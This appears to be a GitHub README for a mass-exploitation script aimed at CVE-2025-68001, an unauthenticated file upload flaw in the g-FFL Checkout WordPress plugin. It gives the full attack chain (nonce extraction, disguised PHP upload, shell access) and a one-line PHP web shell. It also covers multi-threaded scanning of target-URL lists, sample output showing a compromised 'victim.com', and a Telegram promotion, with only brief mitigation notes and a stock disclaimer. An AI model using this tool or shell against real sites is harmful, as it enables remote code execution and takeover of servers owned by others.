
WordPress g-FFL Checkout Plugin <= 2.1.0 is vulnerable to a high priority Arbitrary File Upload
WordPress g-FFL Checkout Plugin <= 2.1.0 is vulnerable to a high priority Arbitrary File Upload
_ _ _ _ _ _ _ _ _ _
/ \ / |_ __ ) / \ ) |_ __ |_ (_) / \ / \ /|
\_ \/ |_ /_ \_/ /_ _) |_) (_) \_/ \_/ |
📡 Stay ahead of the curve. Join @KNxploited on Telegram — your exclusive source for the latest CVEs, zero-days, and cutting-edge exploit research. Updated constantly. Not for everyone.
CVE-2025-68001 is a critical Unauthenticated Arbitrary File Upload vulnerability discovered in the g-FFL Checkout WordPress plugin by garidium.
The vulnerability allows an unauthenticated remote attacker to upload arbitrary files — including web shells — to the target server via the ffl_upload_document AJAX action, leading to full Remote Code Execution (RCE).
| Field | Details |
|---|---|
| CVE ID | CVE-2025-68001 |
| Plugin | g-FFL Checkout (g-ffl-checkout) |
| Affected Versions | n/a through <= 2.1.0 |
| Vulnerability Type | Unrestricted File Upload |
| Impact | Remote Code Execution (RCE) |
| Authentication | Not Required |
| CVSS Severity | Critical |
| Researcher | Nxploited |
The exploit follows a precise multi-step attack chain:
1. GET /checkout
↓
Extract `checkout_nonce` from inline JavaScript data
2. POST /wp-admin/admin-ajax.php
action=ffl_upload_document
nonce=<extracted_nonce>
document_type=document
document=<shell.php disguised as image/png>
↓
Server stores the file without extension or MIME validation
3. Parse JSON response
↓
Extract uploaded file path / unique filename
4. Access uploaded shell via HTTP
↓
Remote Code Execution achieved ✔️
The plugin exposes an AJAX endpoint ffl_upload_document that:
Install all dependencies before running:
pip install requests rich
| Dependency | Purpose |
|---|---|
requests | HTTP requests & session handling |
rich | Terminal UI, progress bars, panels |
threading | Multi-threaded target processing |
Python 3.8+ is required.
CVE-2025-68001/
├── CVE-2025-68001.py # Main exploit script
├── shell.php # Web shell to upload (you provide this)
├── list.txt # Target URLs (one per line)
└── success_results.txt # Auto-generated results output
Create a list.txt file with one target URL per line:
https://target1.com
https://target2.com
http://target3.com/wordpress
The script automatically prepends
http://if no scheme is provided.
Place your PHP web shell in the same directory. Example minimal shell:
<?php system($_GET['cmd']); ?>
Save it as shell.php (or any name — you'll be prompted to enter it).
python CVE-2025-68001.py
You will be prompted interactively:
Enter targets file name (default: list.txt):
> list.txt
Enter shell file name to upload (default: shell.php):
> shell.php
Enter number of threads (default: 50):
> 20
Successful exploits are saved automatically to success_results.txt:
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php
Each line contains:
| Prompt | Default | Description |
|---|---|---|
| Targets file | list.txt | File containing target URLs |
| Shell file | shell.php | PHP shell to upload to the target |
| Number of threads | 50 | Concurrent workers (max: 50) |
✔ https://victim.com — /checkout reachable. Trying exploit...
┌─────────────────────────────────────────────────────┐
│ Success │
│ https://victim.com │
│ Original Name: shell.php │
│ Unique Name: a7f3c1d9e.php │
│ Stored Path: /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘
All targets processed ✔️. Results saved to: success_results.txt
The vulnerability resides in the plugin's AJAX handler registered without capability checks:
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');
function ffl_upload_document() {
// Nonce verified from /checkout page (publicly accessible)
// No MIME type validation
// No extension whitelist/blacklist
move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
wp_send_json_success(['file_path' => $upload_path]);
}
If you are a site owner or developer, take the following steps immediately:
g-ffl-checkout plugin to a patched version (> 2.1.0) if available.htaccess rules).php filesTHIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.
By using this script, you explicitly agree to the following:
• You have EXPLICIT written permission from the target system owner.
• You are operating in a controlled lab or authorized penetration testing engagement.
• You will NOT use this tool against any system you do not own or have legal
authorization to test.
• The author (Nxploited) holds ZERO liability for any damage, data loss,
legal consequences, or misuse resulting from this tool.
Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
— Computer Fraud and Abuse Act (CFAA)
— EU Directive on Attacks Against Information Systems
— And equivalent laws in your jurisdiction.
USE RESPONSIBLY. HACK ETHICALLY.
| Handle | Nxploited |
| Telegram | @KNxploited |
| GitHub | github.com/Nxploited |